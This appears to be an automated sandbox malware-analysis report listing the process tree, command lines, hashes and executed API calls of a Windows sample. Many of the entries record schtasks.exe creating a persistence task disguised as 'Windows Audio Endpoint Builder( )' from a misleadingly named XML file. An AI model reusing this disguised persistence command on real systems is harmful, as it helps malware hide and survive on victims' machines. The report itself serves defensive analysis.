MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	112
Start time:	10:05:39
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a5670000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	113
Start time:	10:05:40
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 8012, Parent PID: 5396

General

Target ID:	114
Start time:	10:05:41
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	115
Start time:	10:05:45
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	116
Start time:	10:05:47
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3480, Parent PID: 7716

General

Target ID:	117
Start time:	10:05:47
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	118
Start time:	10:05:54
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 3720, Parent PID: 5800

General

Target ID:	119
Start time:	10:05:58
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5672, Parent PID: 3720

General

Target ID:	120
Start time:	10:05:58
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	121
Start time:	10:06:00
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	122
Start time:	10:06:00
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 2860, Parent PID: 2820

General

Target ID:	123
Start time:	10:06:08
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	124
Start time:	10:06:09
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8096, Parent PID: 7188

General

Target ID:	125
Start time:	10:06:09
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	126
Start time:	10:06:13
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: cmd.exePID: 6224, Parent PID: 3680

General

Target ID:	127
Start time:	10:06:19
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 5948, Parent PID: 7284

General

Target ID:	128
Start time:	10:06:20
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	129
Start time:	10:06:20
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	130
Start time:	10:06:20
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	131
Start time:	10:06:25
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	132
Start time:	10:06:30
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	133
Start time:	10:06:30
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	134
Start time:	10:06:39
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6524, Parent PID: 1256

General

Target ID:	135
Start time:	10:06:39
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	136
Start time:	10:06:40
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 7376, Parent PID: 3712

General

Target ID:	137
Start time:	10:06:45
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	138
Start time:	10:06:46
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 4432, Parent PID: 5800

General

Target ID:	139
Start time:	10:06:47
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4128, Parent PID: 4432

General

Target ID:	140
Start time:	10:06:47
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	141
Start time:	10:06:51
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	142
Start time:	10:06:53
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	143
Start time:	10:06:57
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	144
Start time:	10:06:57
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	145
Start time:	10:06:57
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	146
Start time:	10:06:59
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: schtasks.exePID: 6700, Parent PID: 7952

General

Target ID:	147
Start time:	10:07:12
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	148
Start time:	10:07:01
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	149
Start time:	10:07:04
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	150
Start time:	10:07:05
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: powershell.exePID: 7624, Parent PID: 5800

General

Target ID:	151
Start time:	10:07:08
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3360, Parent PID: 7624

General

Target ID:	152
Start time:	10:07:08
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	153
Start time:	10:07:11
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	154
Start time:	10:07:20
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	155
Start time:	10:07:16
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	156
Start time:	10:07:16
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	157
Start time:	10:07:16
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	158
Start time:	10:07:17
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	159
Start time:	10:07:17
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.1%
Total number of Nodes:	284
Total number of Limit Nodes:	4

Executed Functions

Function 00007FF676FA1C88 Relevance: 70.2, APIs: 32, Strings: 8, Instructions: 224
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00007FF676FA1D31
lstrlenA.KERNEL32 ref: 00007FF676FA1D41
lstrcatA.KERNEL32 ref: 00007FF676FA1D58
lstrcatA.KERNEL32 ref: 00007FF676FA1D65
wsprintfA.USER32 ref: 00007FF676FA1D7D
lstrcatA.KERNEL32 ref: 00007FF676FA1D89
lstrcatA.KERNEL32 ref: 00007FF676FA1D96
wsprintfA.USER32 ref: 00007FF676FA1DAF
lstrcatA.KERNEL32 ref: 00007FF676FA1DBB
lstrcatA.KERNEL32 ref: 00007FF676FA1DC8
wsprintfA.USER32 ref: 00007FF676FA1DE0
lstrcatA.KERNEL32 ref: 00007FF676FA1DEC
lstrcatA.KERNEL32 ref: 00007FF676FA1DF9
GetCurrentProcess.KERNEL32 ref: 00007FF676FA1E04
OpenProcessToken.ADVAPI32 ref: 00007FF676FA1E17
malloc.LIBCMT ref: 00007FF676FA1E35
GetTokenInformation.KERNELBASE ref: 00007FF676FA1E61
wsprintfA.USER32 ref: 00007FF676FA1E99
lstrcatA.KERNEL32 ref: 00007FF676FA1EA5
lstrcatA.KERNEL32 ref: 00007FF676FA1EB2
LocalFree.KERNEL32 ref: 00007FF676FA1EBD
free.LIBCMT ref: 00007FF676FA1EC6
MessageBoxA.USER32 ref: 00007FF676FA1EE3
ShellExecuteExA.SHELL32 ref: 00007FF676FA1F3B
GetLastError.KERNEL32 ref: 00007FF676FA1F45
lstrcpyA.KERNEL32 ref: 00007FF676FA1F5D
MsgWaitForMultipleObjects.USER32 ref: 00007FF676FA1FD7
GetExitCodeProcess.KERNEL32 ref: 00007FF676FA1FED
CloseHandle.KERNEL32 ref: 00007FF676FA2018

Strings

"__IRAFN:%s", xrefs: 00007FF676FA1D72
__IRAOFF:%I64u, xrefs: 00007FF676FA1D0E
"__IRTSS:%I64u", xrefs: 00007FF676FA1DD5
"__IRCT:%d", xrefs: 00007FF676FA1DA4
@, xrefs: 00007FF676FA1F19
"__IRSID:%s", xrefs: 00007FF676FA1E8E
open, xrefs: 00007FF676FA1EFD
Could not start the setup, xrefs: 00007FF676FA1F56

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: lstrcat$wsprintf$Process$Token$CloseCodeCurrentErrorExecuteExitFreeHandleInformationLastLocalMessageMultipleObjectsOpenShellWaitfreelstrcpylstrlenmalloc
String ID: "__IRAFN:%s"$"__IRCT:%d"$"__IRSID:%s"$"__IRTSS:%I64u"$@$Could not start the setup$__IRAOFF:%I64u$open
API String ID: 1484400040-1136106755
Opcode ID: c97462f1f5602e4cfbf7a5a4862d1832fb5621fcaf903380eaf18b77cb3ccd4d
Instruction ID: 02a1797a1948153bea61ee51dab546c88047cacd18e7e587e112f53bb49d1a14
Opcode Fuzzy Hash: c97462f1f5602e4cfbf7a5a4862d1832fb5621fcaf903380eaf18b77cb3ccd4d
Instruction Fuzzy Hash: 6AB18D33A28BCA96EF14CF21E8445A973A2FB46784F445035DA5E83A68DF7EE459C700

Function 00007FF676FA19B4 Relevance: 63.2, APIs: 28, Strings: 8, Instructions: 153
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32 ref: 00007FF676FA19F5
GetTempPathA.KERNEL32 ref: 00007FF676FA1A11
lstrlenA.KERNEL32 ref: 00007FF676FA1A1E
lstrcpyA.KERNEL32 ref: 00007FF676FA1A48
lstrlenA.KERNEL32 ref: 00007FF676FA1A58
lstrcatA.KERNEL32 ref: 00007FF676FA1A74
wsprintfA.USER32 ref: 00007FF676FA1AA2
wsprintfA.USER32 ref: 00007FF676FA1ABA
DeleteFileA.KERNELBASE ref: 00007FF676FA1AC7
RemoveDirectoryA.KERNELBASE ref: 00007FF676FA1AD1
GetFileAttributesA.KERNELBASE ref: 00007FF676FA1ADB
CreateDirectoryA.KERNELBASE ref: 00007FF676FA1AEC
lstrcpyA.KERNEL32 ref: 00007FF676FA1AFB
SetCurrentDirectoryA.KERNELBASE ref: 00007FF676FA1B06
lstrcpyA.KERNEL32 ref: 00007FF676FA1B1C
CreateDirectoryA.KERNEL32 ref: 00007FF676FA1B29
SetCurrentDirectoryA.KERNEL32 ref: 00007FF676FA1B34
lstrcpyA.KERNEL32 ref: 00007FF676FA1B49
lstrlenA.KERNEL32 ref: 00007FF676FA1B59
lstrcatA.KERNEL32 ref: 00007FF676FA1B75
lstrcpyA.KERNEL32 ref: 00007FF676FA1B87
